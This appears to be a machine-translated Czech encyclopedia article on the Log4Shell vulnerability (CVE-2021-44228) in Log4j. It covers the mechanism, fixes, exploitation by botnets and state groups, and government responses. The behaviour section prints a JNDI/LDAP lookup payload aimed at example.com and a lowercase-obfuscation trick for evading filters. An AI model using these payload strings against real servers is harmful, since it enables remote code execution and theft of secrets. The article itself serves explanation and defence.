Log4Shell

Aktuální verze stránky ještě nebyla zkontrolována zkušenými přispěvateli a může se výrazně lišit od verze recenzované 12. května 2022; kontroly vyžadují 3 úpravy .

Log4Shell ( CVE-2021-44228 ) je zranitelnost nultého dne v Log4j , populárním frameworku pro protokolování Java, zahrnující spuštění libovolného kódu. [1] [2] Zranitelnost – její existence nebyla spatřena od roku 2013 – byla soukromě odhalena nadací Apache Software Foundation , jejíž Log4j je projekt, Chenem Zhaojunem z bezpečnostního týmu Alibaba Cloud dne 24. listopadu 2021 a veřejně zveřejněno 9. prosince 2021. [3] [4] [5] [6] Apache udělil Log4Shellu skóre závažnosti CVSS 10, což je nejvyšší dostupné hodnocení. [7]Odhaduje se, že zneužití postihne stovky milionů zařízení a jeho použití je velmi snadné. [8] [9]

Tato chyba zabezpečení využívá skutečnosti, že Log4j umožňuje požadavky na libovolné servery LDAP a JNDI spíše než ověřování odpovědí, [1] [10] [11] umožňuje útočníkům spouštět libovolný kód Java na serveru nebo jiném počítači nebo přenášet citlivé informace. [5] Apache Security Group zveřejnila seznam dotčených softwarových projektů. [12] Mezi dotčené komerční služby patří Amazon Web Services , [13] Cloudflare , iCloud , [14] Minecraft: Java Edition , [15] Steam , Tencent QQ a mnoho dalších. [10] [16] [17] Podle Wiz a EY se zranitelnost dotkla 93 % podnikových cloudových prostředí. [osmnáct]

Odborníci popsali Log4Shell jako největší zranitelnost všech dob; [19] LunaSec to popsal jako „chybu návrhu katastrofických rozměrů“, [5] Tenable řekl, že zneužití bylo „největší a nejkritičtější zranitelností v historii“, [20] Ars Technica to nazvala „pravděpodobně nejzávažnější zranitelností všech dob“ . [21] a The Washington Post uvedly, že popisy bezpečnostních expertů „hraničí s apokalypsou“. [19]

Pozadí

Log4j je open source protokolovací knihovna , která umožňuje vývojářům softwaru protokolovat data ve svých aplikacích. Tato data mohou zahrnovat vstup uživatele. [22] Je všudypřítomný v aplikacích Java, zejména v podnikovém softwaru. [5] Původně napsaný v roce 2001 Cheki Gulcu, nyní je součástí Apache Logging Services, projektu Apache Software Foundation . [23] Bývalý člen Komise pro kybernetickou bezpečnost prezidenta Baracka Obamy Tom Kellermann popsal Apache jako „jeden z obřích pilířů mostu, který usnadňuje spojovací tkáň mezi světy aplikací a počítačovým prostředím“. [24]

Chování

Java Naming and Directory Interface ( JNDI) vám umožňuje vyhledávat objekty Java za běhu s ohledem na cestu k jejich datům. JNDI může používat několik rozhraní adresářů, z nichž každé poskytuje jiné schéma vyhledávání souborů. Mezi tato rozhraní patří Lightweight Directory Access Protocol (LDAP), protokol, který není Java [25] , který získává objektová data ve formě URL z vhodného serveru, místního nebo jakéhokoli jiného na internetu. [26]

Ve výchozí konfiguraci, když je protokolován řetězec, Log4j 2 provádí substituci řetězce ve výrazech formuláře ${prefix:name}. [26] Můžete například Text: ${java:version}převést na Text: Java version 1.7.0_67. [27] Mezi uznávané výrazy patří ${jndi:<lookup>} ; zadáním vyhledávání přes LDAP lze vyhledat libovolnou adresu URL a načíst ji jako data objektu Java. ${jndi:ldap://example.com/file}po připojení k internetu stáhne data z této adresy URL. Zadáním zaprotokolovaného řetězce může útočník stáhnout a spustit škodlivý kód hostovaný na veřejné adrese URL. [26] I když je spouštění dat zakázáno, může útočník získat data, jako jsou tajné proměnné prostředí, jejich umístěním na adresu URL, kde budou nahrazeny a odeslány na server útočníka. [28] [29] Mezi další potenciálně užitečné vyhledávací protokoly JNDI kromě LDAP patří jeho zabezpečená varianta LDAPS, Java Remote Method Invocation (RMI), Domain Name System (DNS) a Internet Inter-ORB Protocol (IIOP). [30] [31]

Vzhledem k tomu , že požadavky HTTP jsou často protokolovány, je běžným vektorem útoku umístění škodlivého řetězce do adresy URL požadavku HTTP nebo do často protokolované hlavičky HTTP , jako je User-Agent. Prvotní ochrana zahrnovala blokování všech požadavků obsahujících potenciálně škodlivý obsah, jako je ${jndi. [32] Naivní vyhledávání lze obejít obfuskací dotazu: například ${${lower:j}ndibude převedeno na vyhledávání JNDI po provedení operace řetězce na písmenu j. [33] I když vstup, jako je jméno, není okamžitě zaprotokolován, může být později během interního zpracování zaznamenán a jeho obsah spuštěn. [26]

Opravy

Opravy této chyby zabezpečení byly vydány 6. prosince 2021, tři dny před zveřejněním této chyby zabezpečení, v Log4j verze 2.15.0-rc1. [34] [35] [36] Oprava zahrnovala omezení serverů a protokolů, které lze použít pro vyhledávání. Výzkumníci našli související chybu CVE-2021-45046, která umožňuje místní nebo vzdálené spouštění kódu v určitých nevýchozích konfiguracích a byla opravena ve verzi 2.16.0, která deaktivovala všechny funkce využívající JNDI a podporu vyhledávání zpráv. [37] [38] U předchozích verzí musí být třída org.apache.logging.log4j.core.lookup. JndiLookupodstraněna z cesty ke třídě, aby se zmírnily obě zranitelnosti. [7] [37] Dříve doporučenou opravou pro starší verze bylo nastavení systémové vlastnosti log4j2.formatMsgNoLookups truena , ale tato změna nebrání použití CVE-2021-45046. [37]

Novější verze Java Runtime Environment (JRE) také zmírňují tuto zranitelnost tím, že ve výchozím nastavení blokují vzdálené načítání kódu, i když v některých aplikacích stále existují další vektory útoku. [1] [28] [39] [40] Bylo publikováno několik metod a nástrojů, které pomáhají odhalit použití zranitelných verzí log4j ve vestavěných balících Java. [41]

Použití

Tento exploit umožňuje hackerům převzít kontrolu nad zranitelnými zařízeními pomocí Javy . [8] Někteří hackeři tuto zranitelnost využívají k tomu, aby využili zařízení obětí; včetně těžby kryptoměn , vytváření botnetů , rozesílání spamu, vytváření zadních vrátek a dalších nelegálních aktivit, jako jsou útoky ransomwaru. [8] [19] [42] Ve dnech následujících po zveřejnění zranitelnosti Check Point sledoval miliony útoků iniciovaných hackery, přičemž někteří výzkumníci pozorovali přes sto útoků za minutu, což nakonec vedlo k více než 40 % útoků. obchodní sítě vystavené mezinárodním útokům. [8] [24]

Podle generálního ředitele Cloudflare Matthew Prince se důkazy o zneužití nebo testování objevily již 1. prosince, devět dní předtím, než byly zveřejněny. [43] Podle firmy GreyNoise zabývající se kybernetickou bezpečností bylo několik  IP adres seškrábnuto weby , aby zkontrolovaly servery, které mají tuto chybu zabezpečení. [44] Několik botnetů začalo hledat zranitelnost, včetně botnetu Muhstik do 10. prosince, stejně jako Mirai , Tsunami a XMRig. [8] [43] [45] 17. prosince byla společnost Conti spatřena při využívání této zranitelnosti. [19]

Některé státem podporované skupiny v Číně a Íránu také podle Check Pointu využily exploit, i když není známo, zda exploit použil Izrael, Rusko nebo USA předtím, než byla zranitelnost odhalena. [19] [46] Check Point uvedl, že 15. prosince 2021 se hackeři podporovaní Íránem pokusili infiltrovat izraelské podniky a vládní sítě. [19]

Odezva a vliv

Vláda

Ředitelka Agentury pro kybernetickou bezpečnost a bezpečnost infrastruktury (CISA) ve Spojených státech Jen Easterlyová popsala zneužití jako „jeden z nejzávažnějších, ne-li nejzávažnější, jaký jsem za celou svou kariéru viděl“, a vysvětlila, že byly zasaženy stovky milionů zařízení. a doporučil, aby prodejci platili za prioritní aktualizace softwaru. [8] [47] [48] Civilní agentury najaté americkou vládou měly do 24. prosince 2021 na opravu zranitelnosti, i když do té doby by to umožnilo přístup ke stovkám tisíc cílů. [19]

Kanadské centrum pro kybernetickou bezpečnost (CCCS) vyzvalo organizace, aby okamžitě zasáhly. [49] Kanadská finanční agentura dočasně deaktivovala své online služby poté, co se o zneužití dozvěděla, zatímco quebecká vláda uzavřela téměř 4 000 svých webových stránek jako „preventivní opatření“. [padesáti]

Německý Spolkový bezpečnostní úřad ( Bundesamt für Sicherheit in der Informationstechnik) (BSI) identifikoval zneužití jako na nejvyšší úrovni ohrožení a označil jej za „extrémně kritickou nebezpečnou situaci“ (přeloženo). Řekl také, že několik útoků již bylo úspěšných a že rozsah zranitelnosti je stále obtížné posoudit. [51] [52] Nizozemské národní centrum pro kybernetickou bezpečnost (NCSC) spustilo trvalý seznam zranitelných aplikací. [53] [54]

Čínské ministerstvo průmyslu a informačních technologií pozastavilo službu Alibaba Cloud jako partnera pro analýzu kybernetických hrozeb na šest měsíců poté, co nejprve neoznámilo zranitelnost vládě. [55]

Podniky

Studie Wiz a EY [18] zjistila, že 93 % cloudového podnikového prostředí bylo zranitelných vůči Log4Shell. 7 % zranitelných pracovních zátěží je dostupných online a podléhají rozsáhlým pokusům o zneužití. Podle studie bylo deset dní po zveřejnění zranitelnosti (20. prosince 2021) v cloudových prostředích v průměru záplatováno pouze 45 % postižených úloh. Cloudová data od Amazonu, Google a Microsoftu byla ovlivněna Log4Shell. [19]

HR a HR společnost UKG, jedna z největších společností v oboru, byla zasažena ransomwarovým útokem zasahujícím velké podniky. [21] [56] UKG uvedla, že nemá žádné důkazy o tom, že by při incidentu byl použit Log4Shell, ačkoli analytik Allan Liska z kybernetické společnosti Recorded Future uvedl, že zde může být souvislost. [57]

Jak větší společnosti začaly uvolňovat záplaty pro exploit, riziko pro malé podniky se zvýšilo, protože hackeři se zaměřili na zranitelnější cíle. [42]

Ochrana osobních údajů

Osobní zařízení, jako jsou chytré televize a bezpečnostní kamery připojené k internetu, byly vůči zneužití zranitelné. [19]

Analýza

Ke 14. prosinci 2021 byla aktivně prozkoumána téměř polovina všech podnikových sítí na světě a během jednoho dne bylo vytvořeno více než 60 variant exploitů. [58] Check Point Software Technologies v podrobné analýze popsal situaci jako „skutečnou kybernetickou pandemii“ a potenciál škod označil za „nevyčíslitelný“. [59] Několik původních doporučení nadhodnocovalo počet zranitelných balíčků, což vedlo k falešným poplachům. Konkrétně balíček "log4j api" byl označen jako zranitelný, zatímco ve skutečnosti další vyšetřování ukázalo, že zranitelný byl pouze hlavní balíček "log4j-core".

To bylo potvrzeno jak v původním vydání [60] , tak externími bezpečnostními výzkumníky.

Technologický časopis Wired napsal, že navzdory předchozímu „hype“ kolem četných zranitelností je „hype kolem zranitelnosti Log4j... oprávněný z řady důvodů“. [46] Časopis vysvětluje, že všudypřítomnost log4j, jehož zranitelnost je pro potenciální cíle těžké odhalit, a snadnost, s jakou lze kód přenést do stroje oběti, vytvořily „kombinaci vážnosti, dostupnosti a rozšířenosti, která šokovala bezpečnostní profesionály. ." [46] Wired také schematicky představil sekvenci použití Log4Shell hackery: skupiny těžící kryptoměny budou první, kdo tuto zranitelnost zneužijí, poté datoví obchodníci prodají „předmostí“ kyberzločincům, kteří se nakonec zapojí do vydírání, špionáže a ničení dat . . [46]

Amit Göran, generální ředitel Tenable a zakládající ředitel americké Computer Emergency Preparedness Group , uvedl: „[Log4Shell] je zdaleka největší a nejkritičtější zranitelnost v historii“, poznamenal, že sofistikované útoky začaly krátce po chybě a uvedl: „My také již vidíme, že se používá k útokům ransomwaru, což by opět mělo být hlavním probuzením... Také jsme viděli zprávy o útočnících, kteří používají Log4Shell ke zničení systémů, aniž by se pokusili získat výkupné - celkem neobvyklé chování." . [46] Seniorský výzkumník hrozeb společnosti Sophos Sean Gallagher řekl: „Abych byl upřímný, největší hrozbou je, že lidé již získali přístup a právě jej využívají, a i když problém vyřešíte, někdo je již online... Bude existovat tak dlouho jako internet." [dvacet]

Poznámky

  1. 123 Wortley . _ Log4Shell: RCE 0-day exploit nalezený v log4j 2, oblíbeném balíčku pro protokolování Java . LunaSec (9. prosince 2021). Získáno 12. prosince 2021. Archivováno z originálu dne 25. prosince 2021.  
  2. CVE-2021-44228 . Běžné chyby zabezpečení a ohrožení . Získáno 12. prosince 2021. Archivováno z originálu dne 25. prosince 2021.
  3. Povolný. Zranitelnost Log4Shell je uhlí v našich zásobách pro rok  2021 . McAfee (10. prosince 2021). Získáno 12. prosince 2021. Archivováno z originálu dne 24. prosince 2021.
  4. Nejhorší Apache Log4j RCE Zero day Spadl na internet . Kybernetická Kendra (9. prosince 2021). Získáno 12. prosince 2021. Archivováno z originálu dne 24. prosince 2021.
  5. 1 2 3 4 Newman . „Internet je v plamenech“  (anglicky) , Wired  (10. prosince 2021). Archivováno z originálu 24. prosince 2021. Staženo 12. prosince 2021.
  6. Murphy . Hackeři zahájili více než 1,2 milionu útoků prostřednictvím chyby Log4J , Financial Times  (14. prosince 2021). Archivováno z originálu 17. prosince 2021. Staženo 17. prosince 2021.
  7. 1 2 Chyby zabezpečení Apache Log4j . Log4j . Apache Software Foundation. Získáno 12. prosince 2021. Archivováno z originálu dne 26. prosince 2021.
  8. 1 2 3 4 5 6 Murphy, Hannah . Hackeři zahájili více než 1,2 milionu útoků prostřednictvím chyby Log4J , Financial Times  (14. prosince 2021). Archivováno z originálu 21. prosince 2021. Staženo 25. prosince 2021.
  9. Lovec. „Nejzávažnější“ narušení bezpečnosti všech dob se odehrává právě teď. Zde je to, co potřebujete vědět. . The Washington Post (20. prosince 2021). Získáno 25. prosince 2021. Archivováno z originálu dne 27. prosince 2021.
  10. 12 Mott . Nesčetné servery jsou zranitelné vůči Apache Log4j Zero-Day Exploit . PC Magazine (10. prosince 2021). Získáno 12. prosince 2021. Archivováno z originálu dne 24. prosince 2021.  
  11. Dobrý den. Nultý den ve všudypřítomném nástroji Log4j představuje vážnou hrozbu pro   internet ? . Ars Technica (10. prosince 2021). Získáno 12. prosince 2021. Archivováno z originálu dne 23. prosince 2021.
  12. Projekty Apache ovlivněné log4j CVE-2021-44228 (14. prosince 2021). Získáno 25. prosince 2021. Archivováno z originálu dne 17. prosince 2021.
  13. Aktualizace pro vydání Apache Log4j2 (CVE-2021-44228) . Webové služby Amazon (12. prosince 2021). Získáno 13. prosince 2021. Archivováno z originálu dne 28. prosince 2021.
  14. Miluju radost. Apple opravuje zranitelnost Log4Shell iCloud, která je popisována jako nejkritičtější za posledních deset let . 9to5mac (14. prosince 2021). Získáno 25. prosince 2021. Archivováno z originálu dne 23. prosince 2021.
  15. Chyba zabezpečení v Minecraft: Java Edition . Minecraft . Studia Mojang . Získáno 13. prosince 2021. Archivováno z originálu dne 24. prosince 2021.
  16. Dobrý den. Všichni největší hráči internetu jsou ovlivněni kritickým Log4Shell 0-day . ArsTechnica (10. prosince 2021). Získáno 13. prosince 2021. Archivováno z originálu dne 25. prosince 2021.
  17. Rundle. Co je chyba zabezpečení Log4j? (15. prosince 2021). Získáno 25. prosince 2021. Archivováno z originálu dne 25. prosince 2021.
  18. ↑ 1 2 Podniky v polovině záplatování Log4Shell | wiz blog . www.wiz.io. _ Získáno 20. prosince 2021. Archivováno z originálu dne 20. prosince 2021.
  19. 1 2 3 4 5 6 7 8 9 Lovec, Tatum; de Vynck, Gerrit „Nejzávažnější“ narušení bezpečnosti se odehrává právě teď. Zde je to, co potřebujete vědět. . The Washington Post (20. prosince 2021). Získáno 25. prosince 2021. Archivováno z originálu dne 27. prosince 2021.
  20. ↑ 12 Barrett . _ Další vlna útoků Log4J bude brutální  (anglicky) , Wired . Archivováno z originálu 17. prosince 2021. Staženo 17. prosince 2021.
  21. ↑ 12 Dobrý . Zatímco Log4Shell způsobuje zmatek, mzdová služba hlásí   útok ransomwaru ? . Ars Technica (13. prosince 2021). Získáno 17. prosince 2021. Archivováno z originálu dne 17. prosince 2021.
  22. Yan. Další chyba zabezpečení Apache Log4j je aktivně využívána ve volné přírodě (CVE-2021-44228) . Jednotka 42 . Palo Alto Networks (10. prosince 2021). Získáno 25. prosince 2021. Archivováno z originálu dne 24. prosince 2021.
  23. Apache Log4j 2 . Apache Software Foundation. Získáno 12. prosince 2021. Archivováno z originálu dne 14. prosince 2021.
  24. ↑ 1 2 Byrnes. Zranitelnost Hillicon Valley - Apache spouští  poplach . The Hill (14. prosince 2021). Získáno 17. prosince 2021. Archivováno z originálu dne 17. prosince 2021.
  25. "" . RFC rfc4511.
  26. 1 2 3 4 Graham-Cumming. Uvnitř chyby zabezpečení Log4j2 (CVE-2021-44228  ) . Blog Cloudflare (10. prosince 2021). Získáno 13. prosince 2021. Archivováno z originálu dne 22. prosince 2021.
  27. Vyhledávání . Log4j . Apache Software Foundation. Získáno 13. prosince 2021. Archivováno z originálu dne 25. prosince 2021.
  28. 12 Ducklin . Log4Shell vysvětlil – jak to funguje, proč to potřebujete vědět a jak to opravit . Nahá bezpečnost . Sophos (12. prosince 2021). Získáno 12. prosince 2021. Archivováno z originálu dne 26. prosince 2021.
  29. Miessler. Situace log4j (Log4Shell) . Učení bez dozoru (13. prosince 2021). Získáno 25. prosince 2021. Archivováno z originálu dne 13. prosince 2021.
  30. Duraishamy. Opravte nyní Chyba zabezpečení Apache Log4j s názvem Log4Shell Actively Exploited . Trend Micro (13. prosince 2021). Získáno 14. prosince 2021. Archivováno z originálu dne 20. prosince 2021.
  31. Narang. CVE-2021-44228: Proof-of-Concept pro kritickou chybu zabezpečení vzdáleného spuštění kódu Apache Log4j (Log4Shell) . Blog Tenable (10. prosince 2021). Získáno 14. prosince 2021. Archivováno z originálu dne 20. prosince 2021.
  32. Gabor. CVE-2021-44228 - Log4j RCE 0denní zmírnění . Blog Cloudflare (10. prosince 2021). Získáno 13. prosince 2021. Archivováno z originálu dne 23. prosince 2021.
  33. Hahad. Chyba zabezpečení Apache Log4j CVE-2021-44228 vyvolává všeobecné obavy (12. prosince 2021). Získáno 12. prosince 2021. Archivováno z originálu dne 13. prosince 2021.
  34. ↑ Omezte přístup LDAP přes JNDI pomocí rgoers #608  . Log4j (5. prosince 2021). Získáno 12. prosince 2021. Archivováno z originálu dne 30. prosince 2021.
  35. Berger. Co je Log4Shell? Vysvětlení chyby zabezpečení Log4j (a co s tím dělat) . Novinky Dynatrace (17. prosince 2021). Společnost Apache vydala 6. prosince opravu pro CVE-2021-44228, verzi 2.15. Tato oprava však ponechala část zranitelnosti neopravenou, což vedlo k CVE-2021-45046 a druhé opravě, verze 2.16, vydané 13. prosince Apache třetí patch, verze 2.17, 17. prosince, který opravuje další související zranitelnost, CVE-2021-45105." Získáno 25. prosince 2021. Archivováno z originálu dne 21. prosince 2021.
  36. Rudis. Široké využití kritického vzdáleného spouštění kódu v Apache Log4j | Blog  Rapid7 . Rapid7 (10. prosince 2021). Získáno 25. prosince 2021. Archivováno z originálu dne 21. prosince 2021.
  37. 123 CVE - 2021-45046 . Běžné chyby zabezpečení a ohrožení (15. prosince 2021). Získáno 15. prosince 2021. Archivováno z originálu dne 25. prosince 2021.
  38. Greig. Byla objevena druhá chyba zabezpečení Log4j, oprava již  byla vydána . ZDNet (14. prosince 2021). Získáno 17. prosince 2021. Archivováno z originálu dne 27. prosince 2021.
  39. Java(TM) SE Development Kit 8, Update 121 (JDK 8u121) Release  Notes . Oracle (17. ledna 2017). Získáno 13. prosince 2021. Archivováno z originálu dne 19. prosince 2021.
  40. Využití JNDI injekcí v Javě . Veracode (3. ledna 2019). Získáno 15. prosince 2021. Archivováno z originálu dne 15. prosince 2021.
  41. Průvodce: Jak zjistit a zmírnit chybu zabezpečení Log4Shell (CVE-2021-44228  ) . www.lunasec.io (13. prosince 2021). Získáno 13. prosince 2021. Archivováno z originálu dne 24. prosince 2021.
  42. ↑ 12 Woodyard .  'Kritická zranitelnost ' : Pro menší firmy může být těžší zastavit hackery ve využívání chyby Log4j  ? . USA Dnes . Datum přístupu: 17. prosince 2021.
  43. 12 Duckett . Aktivita Log4j RCE začala 1. prosince, když botnety začaly používat  zranitelnost . ZDNet . Získáno 13. prosince 2021. Archivováno z originálu dne 22. prosince 2021.
  44. Aktivita zneužití pro zranitelnost Apache Log4j – CVE-2021-44228 . Výzkum šedého šumu (10. prosince 2021). Získáno 14. prosince 2021. Archivováno z originálu dne 20. prosince 2021.
  45. Zugec. Technické upozornění: Zero-day kritická zranitelnost v Log4j2 využívaná ve volné přírodě . obchodní postřehy . Bitdefender (13. prosince 2021). Získáno 25. prosince 2021. Archivováno z originálu dne 15. prosince 2021.
  46. 1 2 3 4 5 Barrett, Brian . Další vlna útoků Log4J bude brutální  (anglicky) , Wired . Archivováno z originálu 27. prosince 2021. Staženo 25. prosince 2021.
  47. Prohlášení ředitele CISA Easterly o zranitelnosti „Log4j“ . CISA (11. prosince 2021). Získáno 25. prosince 2021. Archivováno z originálu dne 27. prosince 2021.
  48. Woodyard, Chris 'Kritická zranitelnost  ' : Pro menší firmy může být těžší zastavit hackery ve využívání chyby Log4j  ? . USA Dnes . Datum přístupu: 17. prosince 2021.
  49. Prohlášení ministra národní obrany o zranitelnosti Apache a výzva kanadským organizacím, aby přijaly naléhavá  opatření . Vláda Kanady (12. prosince 2021). Získáno 25. prosince 2021. Archivováno z originálu dne 20. prosince 2021.
  50. Cabrera . Quebec čelí hrozbám kybernetické bezpečnosti a uzavírá vládní webové stránky za účelem vyhodnocení , CBC News  (12. prosince 2021). Archivováno z originálu 20. prosince 2021. Staženo 12. prosince 2021.
  51. Sauerwein. Varování BSI vor Sicherheitslücke  (německy) . Tagesschau (12. prosince 2021). Získáno 25. prosince 2021. Archivováno z originálu dne 5. ledna 2022.
  52. (11. prosince 2021). Warnstufe Rot: Schwachstelle Log4Shell führt zu extrem kritischer Bedrohungslage (v de). Tisková zpráva . Archivováno z originálu dne 13. prosince 2021. Načteno 25. 12. 2021 .
  53. J. Vaughan-Nichols. Log4Shell: Jsme v tolika potížích . The New Stack (14. prosince 2021). Získáno 25. prosince 2021. Archivováno z originálu dne 23. prosince 2021.
  54. NCSC-NL/log4shell . Národní centrum kybernetické bezpečnosti (Nizozemsko). Získáno 14. prosince 2021. Archivováno z originálu dne 29. prosince 2021.
  55. Chyba Apache Log4j: Čínské ministerstvo průmyslu stáhlo podporu od Alibaba Cloud za to, že nejprve neohlásilo chybu vládě . Získáno 25. prosince 2021. Archivováno z originálu dne 25. prosince 2021.
  56. Bray. Objevující se softwarová chyba 'Log4j' vyvolává celosvětové obavy z kybernetických útoků – The Boston   Globe ? . The Boston Globe (15. prosince 2021). Získáno 17. prosince 2021. Archivováno z originálu dne 17. prosince 2021.
  57. Bray, Hiawatha Objevující se chyba softwaru 'Log4j' vyvolává celosvětové obavy z kybernetických útoků - The Boston   Globe ? . The Boston Globe (15. prosince 2021). Získáno 17. prosince 2021. Archivováno z originálu dne 17. prosince 2021.
  58. Téměř polovina sítí zkoumala slabiny Log4Shellu . ComputerWeekly (14. prosince 2021). Získáno 25. prosince 2021. Archivováno z originálu dne 20. prosince 2021.
  59. Čísla stojící za kybernetickou pandemií – podrobný ponor . Check Point Software (13. prosince 2021). Získáno 25. prosince 2021. Archivováno z originálu dne 24. prosince 2021.
  60. LOG4J2-3201: Omezte protokoly, které může JNDI používat, a omezte LDAP. . Sledovač problémů JIRA od Apache . Získáno 14. prosince 2021. Archivováno z originálu dne 25. prosince 2021.